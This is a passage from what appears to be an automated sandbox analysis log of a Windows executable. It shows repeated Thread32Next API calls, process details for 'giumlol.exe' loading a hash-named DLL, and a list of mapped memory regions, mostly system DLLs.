lpte=0x14fe78) returned 1 [0264.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.592] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.593] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.594] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.612] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.771] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0264.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0265.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 Thread: id = 218 os_tid = 0x674 Process: id = "31" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x19e23000" os_pid = "0x11d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_decoded_tile" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11891 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11892 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11893 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11894 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 11895 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 11896 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11897 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 11898 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11899 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 11900 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 11901 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11905 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 11906 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11907 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11908 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11909 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 11910 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11911 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11912 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11913 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 11914 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 11915 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11916 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 11917 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 11918 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11919 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11920 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 11921 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 11922 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11923 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11924 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 11925 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 11926 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 11927 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 11928 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 11929 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11930 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11931 start_va = 0x6c0000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 11932 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 